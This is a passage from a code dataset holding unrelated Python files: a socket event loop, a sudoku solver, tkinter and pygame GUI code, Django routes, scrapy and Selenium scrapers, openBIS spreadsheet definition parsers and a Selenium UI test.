connectedtcpsocket import ConnectedTCPSocket\nfrom acceptedtcpsocket import AcceptedTCPSocket\nfrom pollers.detect import get_poller\nfrom pipesocket import PipeSocket\nfrom noc.lib.perf import MetricsHub\n\nlogger = logging.getLogger(__name__)\n\n\nclass SocketFactory(object):\n \"\"\"\n Socket factory is a major event loop controller, maintaining full socket\n lifetime\n \"\"\"\n def __init__(self, tick_callback=None,\n polling_method=None, controller=None,\n write_delay=True, metrics_prefix=None):\n if not metrics_prefix:\n metrics_prefix = \"noc.\"\n metrics_prefix += \"socketfactory\"\n self.metrics = MetricsHub(\n metrics_prefix,\n \"sockets.count\",\n \"sockets.register\",\n \"sockets.unregister\",\n \"loops\",\n \"ticks\",\n \"handle.reads\",\n \"handle.closed_reads\",\n \"handle.writes\"\n )\n self.sockets = {} # fileno -> socket\n self.socket_name = {} # socket -> name\n self.name_socket = {} # name -> socket\n self.new_sockets = [] # list of (socket,name)\n self.tick_callback = tick_callback\n self.to_shutdown = False\n self.register_lock = RLock() # Guard for register/unregister operations\n self.controller = controller # Reference to controlling daemon\n if polling_method is None:\n # Read settings if available\n try:\n from noc.settings import config\n polling_method = config.get(\"main\", \"polling_method\")\n except ImportError:\n polling_method = \"select\"\n self.poller = get_poller(polling_method)\n # Performance data\n self.cnt_polls = 0 # Number of polls\n self.write_delay = write_delay\n if not self.write_delay:\n self.control = PipeSocket(self)\n\n def shutdown(self):\n \"\"\"\n Shut down socket factory and exit next event loop\n \"\"\"\n logger.info(\"Shutting down the factory\")\n self.to_shutdown = True\n\n def register_socket(self, socket, name=None):\n \"\"\"\n Register socket to a factory. 
Socket became a new socket\n \"\"\"\n logger.debug(\"Register socket %s (%s)\", socket.get_label(), name)\n with self.register_lock:\n self.new_sockets += [(socket, name)]\n self.metrics.sockets_register += 1\n\n def unregister_socket(self, socket):\n \"\"\"\n Remove socket from factory\n \"\"\"\n with self.register_lock:\n logger.debug(\"Unregister socket %s\", socket.get_label())\n self.set_status(socket, r=False, w=False)\n if socket not in self.socket_name: # Not in factory yet\n return\n self.sockets.pop(socket.fileno(), None)\n old_name = self.socket_name.pop(socket, None)\n self.name_socket.pop(old_name, None)\n if socket in self.new_sockets:\n self.new_sockets.remove(socket)\n self.metrics.sockets_unregister -= 1\n\n def guarded_socket_call(self, socket, method):\n \"\"\"\n Wrapper for safe call of socket method. Handles and reports\n socket errors.\n\n :return: Call status\n :rtype: Bool\n \"\"\"\n try:\n method()\n except Exception:\n exc = get_socket_error()\n try:\n if exc:\n socket.on_error(exc)\n else:\n socket.error(\"Unhandled exception when calling %s\" % str(method))\n error_report()\n socket.close()\n except Exception:\n socket.error(\"Error when handling error condition\")\n error_report()\n return False\n return True\n\n def init_socket(self, socket, name):\n \"\"\"\n Initialize new socket. Call socket's create_socket() when necessary\n and attach socket to fabric's event loop\n \"\"\"\n if not socket.socket_is_ready():\n socket.debug(\"Initializing socket\")\n if not self.guarded_socket_call(socket, socket.create_socket):\n return\n if not socket.socket_is_ready():\n # Race condition raised. Socket is unregistered since last socket.create_socket call.\n # Silently ignore and exit\n return\n with self.register_lock:\n self.sockets[socket.fileno()] = socket\n if socket in self.socket_name:\n # Socket was registred\n old_name = self.socket_name[socket]\n del self.socket_name[socket]\n if old_name:\n del self.name_socket[old_name]\n self.socket_name[socket] = name\n if name:\n self.name_socket[name] = socket\n\n def listen_tcp(self, address, port, socket_class, backlog=100,\n nconnects=None, **kwargs):\n \"\"\"Create listening TCP socket\"\"\"\n if not issubclass(socket_class, AcceptedTCPSocket):\n raise ValueError(\"socket_class should be a AcceptedTCPSocket subclass\")\n l = ListenTCPSocket(self, address, port, socket_class, backlog,\n nconnects, **kwargs)\n l.set_name(\"listen-tcp-%s:%d\" % (address, port))\n return l\n\n def connect_tcp(self, address, port, socket_class):\n \"\"\"Create ConnectedTCPSocket\"\"\"\n if not issubclass(socket_class, ConnectedTCPSocket):\n raise ValueError(\"socket_class should be a ConnectedTCPSocket subclass\")\n return socket_class(self, address, port)\n\n def get_socket_by_name(self, name):\n \"\"\"Get socket by registered name\"\"\"\n with self.register_lock:\n return self.name_socket[name]\n\n def get_name_by_socket(self, socket):\n \"\"\"Get socket name by instance\"\"\"\n with self.register_lock:\n return self.socket_name[socket]\n\n def __len__(self):\n \"\"\"Returns a number of factory's sockets\"\"\"\n with self.register_lock:\n return len(self.sockets)\n\n def close_stale(self):\n \"\"\"Detect and close stale sockets\"\"\"\n with self.register_lock:\n for s in [s for s in self.sockets.itervalues() if s.is_stale()]:\n logger.debug(\"Closing stale socket %s\", s.get_label())\n s.stale = True\n s.close()\n\n def create_pending_sockets(self):\n \"\"\"Initialize pending sockets\"\"\"\n with self.register_lock:\n while 
self.new_sockets:\n socket, name = self.new_sockets.pop(0)\n self.init_socket(socket, name)\n\n def set_status(self, sock, r=None, w=None):\n with self.register_lock:\n if r is not None:\n if r:\n self.poller.add_reader(sock)\n else:\n self.poller.remove_reader(sock)\n if w is not None:\n if w:\n self.poller.add_writer(sock)\n if not self.write_delay:\n # Force get_active() completion\n self.control.write(\"x\")\n else:\n self.poller.remove_writer(sock)\n\n def loop(self, timeout=1):\n \"\"\"\n Generic event loop\n \"\"\"\n self.metrics.loops += 1\n self.create_pending_sockets()\n self.metrics.sockets_count = len(self.sockets)\n if self.sockets:\n r, w = self.poller.get_active(timeout)\n self.cnt_polls += 1\n # Process write events before read\n # to catch refused connections\n for s in w:\n self.metrics.handle_writes += 1\n self.guarded_socket_call(s, s.handle_write)\n # Process read events\n for s in r:\n if s.closing:\n logger.info(\"Trying to read from closed socked\")\n self.metrics.handle_closed_reads += 1\n else:\n self.metrics.handle_reads += 1\n self.guarded_socket_call(s, s.handle_read)\n else:\n # No socket initialized. Sleep to prevent CPU hogging\n time.sleep(timeout)\n\n def run(self, run_forever=False):\n \"\"\"\n Socket factory event loop.\n\n :param run_forever: Run event loop forever, when True, else shutdown\n fabric when no sockets available\n \"\"\"\n logger.info(\"Running socket factory (%s)\", self.poller.__class__.__name__)\n self.create_pending_sockets()\n if run_forever:\n cond = lambda: True\n else:\n if self.write_delay:\n cond = lambda: bool(self.sockets)\n else:\n cond = lambda: len(self.sockets) > 1\n # Wait for any socket\n while not cond():\n time.sleep(1)\n last_tick = last_stale = time.time()\n while cond() and not self.to_shutdown:\n self.loop(1)\n t = time.time()\n if self.tick_callback and t - last_tick >= 1:\n self.metrics.ticks += 1\n try:\n self.tick_callback()\n except Exception:\n error_report()\n logger.info(\"Restoring from tick() failure\")\n last_tick = t\n if t - last_stale >= 1:\n self.close_stale()\n last_stale = t\n logger.info(\"Stopping socket factory\")\n","sub_path":"lib/nbsocket/socketfactory.py","file_name":"socketfactory.py","file_ext":"py","file_size_in_byte":10138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"205540228","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 13 10:54:25 2018\n\n@author: obp48\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom decimal import * \nimport random\nimport pandas as pd\nimport pickle\n\ndata_dir='./../../../../../../Dropbox/LML_research/ee_data'\n\nT = 1040\nN_ensemble=1\n\nensemble = pd.DataFrame(index=np.arange(0,N_ensemble),columns=np.arange(0,T))\nensemble.iloc[:,0]=np.ones(N_ensemble)\n\n## T multiplicative repetitions\n#for t in range(1, T):\n# # 50% chance of 0.6x what we had before, or\n# # 50% chance of 1.5x what we had before.\n# old=ensemble.iloc[0,t-1]\n# new=Decimal(old)*Decimal(np.random.choice([0.6, 1.5]))\n# ensemble.iloc[:,t]=new \n#ensemble.to_pickle(data_dir+\"coin_20_years.pkl\")\nensemble=pd.read_pickle(data_dir+\"coin_20_years.pkl\")\n\nx = np.arange(T)\nplt.semilogy(x, ensemble.iloc[0,:], 'b-', label='$N=1$')\n#plt.plot(x, np.mean(ensemble.iloc[0:100,:]), 'g-', label='$N=100$')\n#plt.plot(x, np.mean(ensemble.iloc[0:10000,:]), 'r-', label='$N=10,000$')\n#plt.plot(x, np.mean(ensemble), 'k-', 
label='$N=1,000,000$')\nplt.xlim((0,max(ensemble.columns)))\nplt.legend()\nplt.xlabel('$t$')\nplt.ylabel('$x(t)$')\n\n\nplt.savefig(\"./../x_of_t_log_20_year.pdf\", bbox_inches='tight')\nplt.show()\n","sub_path":"chapter_why/figs/python/x_of_t_log_20_year.py","file_name":"x_of_t_log_20_year.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"272006551","text":"import math;\nclass Solution:\n    def __init__(self):\n        super().__init__()\n\n    def isValidSudoku(self, board):\n        res = self._dfs(board)\n        return res\n\n    def solveSudoku(self, board):\n        self._dfs(board)\n        return board\n    \n    def _dfs(self, board):\n        for i in range(len(board)):\n            for j in range(len(board[i])):\n                if board[i][j] == '.':\n                    for m in range(1, 10):\n                        if self.isValidChar(board, i, j, str(m)):\n                            board[i][j] = str(m)\n                            if self._dfs(board):\n                                return True\n                            else:\n                                board[i][j] = '.'\n                    return False\n        return True;\n\n    def isValidChar(self, board, row, col, char):\n        for i in range(9):\n            if board[i][col] == char:\n                return False\n            if board[row][i] == char:\n                return False\n        m = math.floor(row / 3)\n        n = math.floor(col / 3)\n        for i in range(m * 3, m * 3 + 3, 1):\n            for j in range(n * 3, n * 3 + 3, 1):\n                if board[i][j] == char:\n                    return False\n        return True\n","sub_path":"数据结构与算法/极客时间/剪枝/数独/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292744441","text":"\"\"\"\n    Version Software: 0.0.0\n    Version Python: 3.7\n\"\"\"\n\nimport main\nimport tkinter as tk\nimport ideal as id\nimport balistico as bl\n\nclass menu(tk.Frame):\n    propiedades = main.propiedades() #Importando propiedades del proyecto\n    ventana = tk.Tk()\n    ventana.title(propiedades.version)\n    ventana.config(bg=\"white\")\n    ventana.config(relief=\"flat\", bd=8) #tipo de borde relief y bd es la medida\n\n    frame = tk.Frame(ventana) #Creamos un frame el cual pertenece a ventana\n    frame.pack(fill = \"both\", expand=\"true\") #Empaquetamos el frame\n    frame.config(bg = \"#bfbfbf\", width = propiedades.default_size_ancho, height = propiedades.default_size_alto) #Medidas iniciales de la ventana + Color de fondo\n    ventana.mainloop()\n","sub_path":"dev/interfaz.py","file_name":"interfaz.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"73499355","text":"from tkinter import *\nfrom tkinter.messagebox import *\nfrom tkinter.filedialog import *\n\nclass InterfaceConfirmation(Frame):\n\n    def __init__(self, fenetre,rep,dico,suppr_originaux, **kwargs):\n        Frame.__init__(self, fenetre, **kwargs)\n        str_originaux=\"\"\n        if (suppr_originaux==1):\n            str_originaux=\"supprimés\"\n        else:\n            str_originaux=\"conservés\"\n        self.message_principal = Label(self, text=\"Dans le dossier \"+rep+\", encodage dans les formats : \"+self.str_dict(dico)+\".\\n Les originaux seront \" + str_originaux+ \".\\nCliquez sur Suivant pour lancer l'encodage \\n\")\n        self.message_principal.pack()\n\n    def str_dict(self,un_dico): #Pour afficher correctement les préconfigs\n        s=\"\\n\"\n        for k in un_dico.keys():\n            s=s+k+\"\\n\"\n        return s\n","sub_path":"interfaceConfirmation.py","file_name":"interfaceConfirmation.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"516210087","text":"from peptide_builders import PeptideMolecule\nfrom 
functional_group_enumerator import Cocktail\n\nif __name__ == '__main__':\n\n peptide_backbone = PeptideMolecule(6)\n cocktail = Cocktail(\n peptide_backbone,\n ligand_library = ['Br','I', 'Cl', 'F', 'I', 'F']\n )\n print (len(cocktail.shake()))","sub_path":"cocktail_shaker/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"512370393","text":"# exemplo 4 IMC com ciclo - while\r\n\r\nresp = 's'\r\nwhile resp == 's':\r\n peso=float(input(\"Digite o peso da pessoa (Kg): \"))\r\n altura = float(input(\"Digite a altura da pessoa (m): \"))\r\n if (peso > 0 and altura > 0.10 and altura < 2.5):\r\n imc= peso / altura**2\r\n print(\"O IMC é: \",imc, \"Kg/m**2\")\r\n else:\r\n print(\"Verifique por favor, valor incorreto!!!\")\r\n\r\n resp = input(\"\\n Deseja continuar (s/n) ? \")\r\n\r\nprint(\"\\n até logo!!!!!\")\r\n","sub_path":"aula 10/exempo4.py","file_name":"exempo4.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"69447879","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('table/', views.table, name='table'),\n path('add/', views.add_channel, name='add_channel'),\n path('channel//', views.channel, name='channel'),\n path('logout/', views.log_out, name='logout'),\n path('register/', views.registerPage, name=\"register\"),\n path('login/', views.loginPage, name=\"login\"),\n path('', views.home, name='home'),\n path('edit//', views.edit, name=\"edit\"),\n\n]\n","sub_path":"TelegramChannels/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"404176043","text":"import pandas as pd\r\nimport selenium\r\n\r\nimport os\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\nimport pandas as pd\r\nimport time\r\n\r\ndriver= webdriver.Chrome(executable_path=r\"C:\\Users\\Merit\\Downloads\\chromedriver_win32\\chromedriver.exe\")\r\ndriver.get(\"https://ai.fmcsa.dot.gov/hhg/Search.asp?ads=a\")\r\ndriver.maximize_window()\r\ntime.sleep(1)\r\nstates1=driver.find_elements_by_xpath(\"//option[contains(text(),'Please select state')]//following::option\")\r\ntime.sleep(1)\r\nStates=[]\r\nwriter=pd.ExcelWriter(\"States.xlsx\",engine='xlsxwriter')\r\nfor i in states1:\r\n States.append(i.text)\r\nfor j in States[0:10]:\r\n driver.find_element_by_xpath(\"//option[contains(text(),'\"+j+\"')]\").click()\r\n time.sleep(1)\r\n driver.find_element_by_xpath(\"//input[@value='Search']\").click()\r\n dt=driver.find_elements_by_xpath(\"//tr[contains(@scope,'row')]\")\r\n listofcompany= []\r\n for k in dt:\r\n listofcompany.append(k.text.split(\" \"))\r\n driver.back()\r\n df=pd.DataFrame(listofcompany,columns=[\"COMPANY_NAME\",\"HEADQUATERS_LOCATION\",\"COMPANY_TYPE\",\"FLEET_SIZE\"])\r\n df.to_excel(writer,sheet_name=j, index=False)\r\nwriter.save()\r\nwriter.close()\r\ndriver.close()","sub_path":"PYTHON SELENIUM ASSIGNMENT/TASK3 STATES COMPANY/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"274123580","text":"import argparse\nimport collections\nimport copy\nimport sys\n\nLocation = collections.namedtuple('Location', ['row', 'col'])\n\n\nclass 
ReachedContradiction(ValueError):\n pass\n\n\nclass SquareMap(collections.UserDict):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._side_len = None\n self._mini_square_len = None\n\n @property\n def side_len(self):\n assert self._side_len\n return self._side_len\n\n @side_len.setter\n def side_len(self, value):\n assert isinstance(value, int)\n self._side_len = value\n\n @property\n def mini_square_len(self):\n return self._mini_square_len\n\n @mini_square_len.setter\n def mini_square_len(self, value):\n assert isinstance(value, int)\n self._mini_square_len = value\n\n\ndef construct_square_map(mini_square_len, symbols):\n dct = SquareMap()\n length = mini_square_len * mini_square_len\n dct.side_len = length\n dct.mini_square_len = mini_square_len\n\n for row in range(length):\n for col in range(length):\n dct[Location(row, col)] = set(symbols)\n\n return dct\n\n\ndef insert_symbol(square_map, location, symbol):\n return remove_symbol_from_locations(\n square_map,\n locations_affected_by_location(square_map, location),\n symbol\n )\n\n\ndef remove_symbol_from_locations(square_map, locations, symbol):\n total_removed = 0\n modified = False\n for loc in locations:\n allowed = square_map[loc]\n\n assert len(allowed) > 0, 'got {allowed}'.format(**locals())\n if len(allowed) == 1 and symbol in allowed:\n raise ReachedContradiction('{symbol} is alone in {allowed}'.format(**locals()))\n\n try:\n allowed.remove(symbol)\n total_removed += 1\n except KeyError:\n pass\n\n return total_removed\n\n\ndef locations_affected_by_location(square_map, location):\n affected_rows = [Location(row, location.col) for row in range(square_map.side_len)]\n affected_cols = [Location(location.row, col) for col in range(square_map.side_len)]\n affected_square = []\n mini_square_len = square_map.mini_square_len\n square_row = mini_square_len * (location.row // mini_square_len)\n square_col = mini_square_len * (location.col // mini_square_len)\n for row in range(square_row, square_row+mini_square_len):\n for col in range(square_col, square_col+mini_square_len):\n affected_square.append(Location(row, col))\n\n affected = set(affected_rows + affected_cols + affected_square)\n affected.remove(location)\n return affected\n\n\ndef solve(square_map):\n finished, square_map, _ = eliminate(square_map)\n if finished:\n return True, square_map\n best_squares = []\n for loc, symbols in sorted(square_map.items(), key=lambda item: len(item[1])):\n for sym in symbols:\n if len(symbols) == 1:\n continue\n copied = copy.deepcopy(square_map)\n copied[loc].remove(sym)\n try:\n solved, result, eliminated = eliminate(copied)\n except ReachedContradiction:\n continue\n if solved:\n return True, result\n else:\n best_squares.append((eliminated, result))\n best_squares.sort(key=lambda e: e[0], reverse=True)\n for _, sm in best_squares:\n print('Number of best squares is', len(best_squares))\n solved, result = solve(sm)\n if solved:\n return True, result\n return False, None\n\n\ndef eliminate(square_map):\n total_eliminated = 0\n while True:\n modified_any = False\n finished = True\n for location, symbols in square_map.items():\n if len(symbols) == 1:\n symbol = next(iter(symbols))\n affected = locations_affected_by_location(square_map, location)\n modified_count = remove_symbol_from_locations(square_map, affected, symbol)\n total_eliminated += modified_count\n modified_any = modified_any or modified_count > 0\n else:\n finished = False\n if finished:\n return finished, square_map, total_eliminated\n elif 
not modified_any:\n return modified_any, square_map, total_eliminated\n\n\ndef parse_input_file(file):\n with open(file, mode='r', encoding='ascii') as f:\n text = f.read()\n\n print(text)\n lines = iter(text.splitlines(keepends=False))\n try:\n mini_square_length = int(next(lines))\n except TypeError:\n print('Invalid input file. Expected integer on the first line for number of symbols')\n sys.exit(1)\n if not (2 <= mini_square_length <= 3):\n print('Expected N to be either 2 or 3')\n sys.exit(2)\n if len(text.splitlines(keepends=False)) - 1 != mini_square_length*mini_square_length:\n print('Expected number of lines to be', mini_square_length*mini_square_length)\n symbol_loc_map = {}\n\n for row, line in enumerate(lines):\n symbols = [s for s in line.split() if s]\n for col, sym in enumerate(symbols):\n if sym == '0':\n continue\n symbol_loc_map[Location(row, col)] = sym\n\n all_symbols = set(symbol_loc_map.values())\n square_map = construct_square_map(mini_square_length, all_symbols)\n\n for loc, symbol in symbol_loc_map.items():\n insert_symbol(square_map, loc, symbol)\n\n return square_map\n\n\ndef print_square_map(square_map):\n def stringify_set(symbols):\n if len(symbols) == 1:\n return next(iter(symbols))\n else:\n return 'U'\n\n for row in range(square_map.side_len):\n line = []\n for loc, sym in square_map.items():\n if loc.row == row:\n line.append((loc, sym))\n line.sort()\n pretty = (stringify_set(e[1]) for e in line)\n print(' '.join(pretty))\n\n\ndef is_valid(square_map):\n for loc, symbols in square_map.items():\n sym = next(iter(symbols))\n affected = locations_affected_by_location(square_map, loc)\n for affected_loc in affected:\n if affected_loc == loc:\n continue\n if len(square_map[affected_loc]) != 1 or sym in square_map[affected_loc]:\n return False\n return True\n\n\ndef run(*, mini_square_side_length, marked_locations):\n assert 2 <= mini_square_side_length <= 3\n assert len(marked_locations) <= 81\n\n all_symbols = set(loc[2] for loc in marked_locations)\n\n assert (len(all_symbols) >= mini_square_side_length * mini_square_side_length)\n\n square_map = construct_square_map(mini_square_side_length, all_symbols)\n\n for row, col, symbol in marked_locations:\n insert_symbol(square_map, Location(row, col), symbol)\n\n solved, result = solve(square_map)\n\n assert solved\n\n return list(iter_rows(result, mini_square_side_length))\n\n\ndef iter_rows(solution, mini_square_side_length):\n cells = sorted(solution.items())\n column_count = mini_square_side_length * mini_square_side_length\n for row in range(column_count):\n row_cells = sorted(c for c in cells if c[0].row == row)\n print('row cells are', row_cells)\n yield [next(iter(c[1])) for c in row_cells]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('file')\n args = parser.parse_args()\n square_map = parse_input_file(args.file)\n solved, result = solve(square_map)\n if solved:\n print('Solution')\n print_square_map(result)\n sys.exit()\n else:\n print('Could not find solution')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"taesko/fast_tasks/ft/tasks/squares.py","file_name":"squares.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"454614210","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pygame\n\nclass Brick_GUI(pygame.sprite.Sprite):\n\n # Các giá trị của khối gạch\n def __init__(self,brick,unit):\n super(Brick_GUI, self).__init__()\n self.unit = int(unit)\n\n 
self.length = brick.length\n\n if brick.isVetical:\n self.img_load = pygame.image.load('image/vertical.png')\n self.image = pygame.transform.scale(self.img_load,(self.unit,self.length*self.unit))\n else:\n if brick.id == 1:\n self.img_load = pygame.image.load('image/object.png')\n else:\n self.img_load = pygame.image.load('image/horizontal.png')\n self.image = pygame.transform.scale(self.img_load,(self.unit*self.length,self.unit))\n\n self.rect = self.image.get_rect()\n self.rect.topleft = [(brick.position[1])*self.unit + 12,(brick.position[0]+1)*self.unit + 108]\n\n def moveVertical(self,moves,pixel):\n tmp = self.rect.topleft[1]\n if moves < 0:\n while self.rect.topleft[1] >= ( tmp + moves*self.unit):\n self.rect.y = self.rect.topleft[1] + moves*pixel\n else:\n while self.rect.topleft[1] <= ( tmp + moves*self.unit):\n #print(self.rect.topleft[1])\n self.rect.y = self.rect.topleft[1] + moves*pixel\n #self.rect.move_ip(0,1)\n\n def moveHorizontal(self,moves,pixel):\n tmp = self.rect.topleft[0]\n if moves < 0:\n while self.rect.topleft[0] >= (tmp + moves*self.unit):\n #self.rect.x += moves*pixel\n self.rect.x = self.rect.topleft[0] + moves*pixel\n else:\n while self.rect.topleft[0] <= (tmp + moves*self.unit):\n #self.rect.x += moves*pixel\n self.rect.x = self.rect.topleft[0] + moves*pixel","sub_path":"Brick_GUI.py","file_name":"Brick_GUI.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"175031132","text":"# Copyright (c) 2010 gocept gmbh & co. kg\n# See also LICENSE.txt\n\n# See also LICENSE.txt\n\nimport asm.cmsui.testing\nimport asm.cms.page\nimport transaction\nimport ZODB.blob\n\n\nclass Asset(asm.cmsui.testing.SeleniumTestCase):\n\n def setUp(self):\n super(Asset, self).setUp()\n self.cms['asset'] = asset = asm.cms.page.Page('asset')\n transaction.commit()\n self.selenium.open('http://%s/++skin++cms/cms/asset/edition-/@@edit' %\n self.selenium.server)\n\n def test_asset_download_button_hidden_if_no_content(self):\n self.selenium.assertElementNotPresent(\n 'xpath=//input[@type=\"button\" and @value=\"Download\"]')\n\n def test_asset_download_button(self):\n self.cms['asset'].editions.next().content = ZODB.blob.Blob()\n transaction.commit()\n\n s = self.selenium\n s.open('http://%s/++skin++cms/cms/asset/edition-/@@edit' % s.server)\n s.click('xpath=//input[@type=\"button\" and @value=\"Download\"]')\n self.assertEquals(\n 'http://%s/++skin++cms/cms/asset/edition-/@@edit' % s.server\n ,s.getLocation())\n","sub_path":"src/asm/cmsui/tests/test_asset.py","file_name":"test_asset.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371974243","text":"import scrapy\n\n\nclass CategoriesSpider(scrapy.Spider):\n name = \"categories\"\n start_urls = [\n 'https://suzyshier.com/collections/sz_shop-all'\n ]\n\n def parse(self, response):\n for category in response.css('li.menu-depth-2 div.menu-title'):\n\n # follow bottoms link\n if category.css('a::text').extract_first() == 'Bottoms':\n for i in range(1, 3):\n yield response.follow(\n 'https://suzyshier.com'\n + category.css('a::attr(href)').extract_first()\n + '?page={}'.format(i),\n self.parse_bottom_links\n )\n\n # follow web exclusives link\n elif category.css('a::text').extract_first() == 'Web Exclusives':\n yield response.follow(\n 'https://suzyshier.com'\n + category.css('a::attr(href)').extract_first(),\n self.parse_web_exclusives_links\n )\n\n def 
parse_bottom_links(self, response):\n links = []\n\n for item in response.css('div.product-tile-image'):\n links.append(item.css('a::attr(href)').extract_first())\n\n for link in links:\n yield response.follow(\n 'https://suzyshier.com' + link, self.parse_bottom_items\n )\n\n def parse_bottom_items(self, response):\n specs = response.css('div#toggle-product__specs ul li::text').extract()\n for spec in specs:\n spec.strip()\n\n if response.css('div.product__price-wrapper span.visually-hidden'):\n price = response.css('span.product__compare-at::text').extract_first().strip()\n else:\n price = response.css('span.product__price::text').extract_first().strip()\n\n yield {\n 'title': response.css('h1.product__header::text').extract_first(),\n 'price': price,\n 'color': response.css('div.product__option-label span::text').extract_first(),\n 'sizes': response.css('div.product__radio-size-text::text').extract(),\n 'specs': specs,\n 'description': response.css('div.product__description-toggle-item::text').extract_first().strip()\n }\n\n def parse_web_exclusives_links(self, response):\n links = []\n\n for item in response.css('div.product-tile-image'):\n links.append(item.css('a::attr(href)').extract_first())\n\n for link in links:\n yield response.follow(\n 'https://suzyshier.com' + link, self.parse_web_exclusives_items\n )\n\n def parse_web_exclusives_items(self, response):\n if response.css('div.product__price-wrapper span.visually-hidden'):\n price = response.css('span.product__compare-at::text').extract_first().strip()\n discount = response.css('span.product__price::text').extract_first().strip()\n else:\n price = response.css('span.product__price::text').extract_first().strip()\n discount = 'No discount'\n\n yield {\n 'title': response.css('h1.product__header::text').extract_first(),\n 'price': price,\n 'discount_price': discount\n }\n","sub_path":"parser_wsy/spiders/items_spider.py","file_name":"items_spider.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483220631","text":"from java.lang import UnsupportedOperationException\nfrom ..definition import Definition\nfrom .poi_cleaner import PoiCleaner\n\n\nclass DefinitionParserFactory(object):\n\n @staticmethod\n def get_parser(definition_type):\n if definition_type in ['VOCABULARY_TYPE', 'SAMPLE_TYPE', 'EXPERIMENT_TYPE', 'DATASET_TYPE', 'EXPERIMENT',\n 'SAMPLE']:\n return GeneralDefinitionParser\n elif definition_type in ['PROPERTY_TYPE', 'SPACE', 'PROJECT']:\n return PropertiesOnlyDefinitionParser\n else:\n raise UnsupportedOperationException(\n \"Cannot create \" + str(\n definition_type) + \". 
Make sure Definition (First row, first cell of each definition) is correct.\")\n\n\nclass PropertiesOnlyDefinitionParser(object):\n\n    @staticmethod\n    def parse(poi_definition):\n        DEFINITION_TYPE_ROW = 0\n        DEFINITION_TYPE_CELL = 0\n        PROPERTIES_HEADER_ROW = 1\n        PROPERTIES_VALUES_ROW_START = 2\n\n        row_numbers = {\n            'DEFINITION_TYPE_ROW': DEFINITION_TYPE_ROW,\n            'DEFINITION_TYPE_CELL': DEFINITION_TYPE_CELL,\n            'ATTRIBUTES_HEADER_ROW': None,\n            'ATTRIBUTES_VALUES_ROW': None,\n            'PROPERTIES_HEADER_ROW': PROPERTIES_HEADER_ROW,\n            'PROPERTIES_VALUES_ROW_START': PROPERTIES_VALUES_ROW_START\n        }\n\n        poi_definition = PoiCleaner.clean_data(poi_definition, row_numbers)\n        definition = Definition()\n        definition.type = poi_definition[DEFINITION_TYPE_ROW][DEFINITION_TYPE_CELL]\n\n        if PropertiesOnlyDefinitionParser.hasProperties(poi_definition):\n            properties_headers = poi_definition[PROPERTIES_HEADER_ROW]\n\n            for property_definitions in poi_definition[PROPERTIES_VALUES_ROW_START:]:\n                property = {}\n                for col, header in properties_headers.items():\n                    property[header] = property_definitions[col]\n                definition.properties.append(property)\n\n        return definition\n\n    @staticmethod\n    def hasProperties(poi_definition):\n        PROPERTIES_HEADER_ROW = 1\n        return len(poi_definition) > PROPERTIES_HEADER_ROW\n\n\nclass GeneralDefinitionParser(object):\n\n    @staticmethod\n    def parse(poi_definition):\n        DEFINITION_TYPE_ROW = 0\n        DEFINITION_TYPE_CELL = 0\n        ATTRIBUTES_HEADER_ROW = 1\n        ATTRIBUTES_VALUES_ROW = 2\n        PROPERTIES_HEADER_ROW = 3\n        PROPERTIES_VALUES_ROW_START = 4\n\n        row_numbers = {\n            'DEFINITION_TYPE_ROW': DEFINITION_TYPE_ROW,\n            'DEFINITION_TYPE_CELL': DEFINITION_TYPE_CELL,\n            'ATTRIBUTES_HEADER_ROW': ATTRIBUTES_HEADER_ROW,\n            'ATTRIBUTES_VALUES_ROW': ATTRIBUTES_VALUES_ROW,\n            'PROPERTIES_HEADER_ROW': PROPERTIES_HEADER_ROW,\n            'PROPERTIES_VALUES_ROW_START': PROPERTIES_VALUES_ROW_START\n        }\n\n        poi_definition = PoiCleaner.clean_data(poi_definition, row_numbers)\n\n        definition = Definition()\n        definition.type = poi_definition[DEFINITION_TYPE_ROW][DEFINITION_TYPE_CELL]\n        for col, header in poi_definition[ATTRIBUTES_HEADER_ROW].items():\n            cell_value = poi_definition[ATTRIBUTES_VALUES_ROW][col]\n            definition.attributes[header] = cell_value\n\n        if GeneralDefinitionParser.hasProperties(poi_definition):\n            properties_headers = 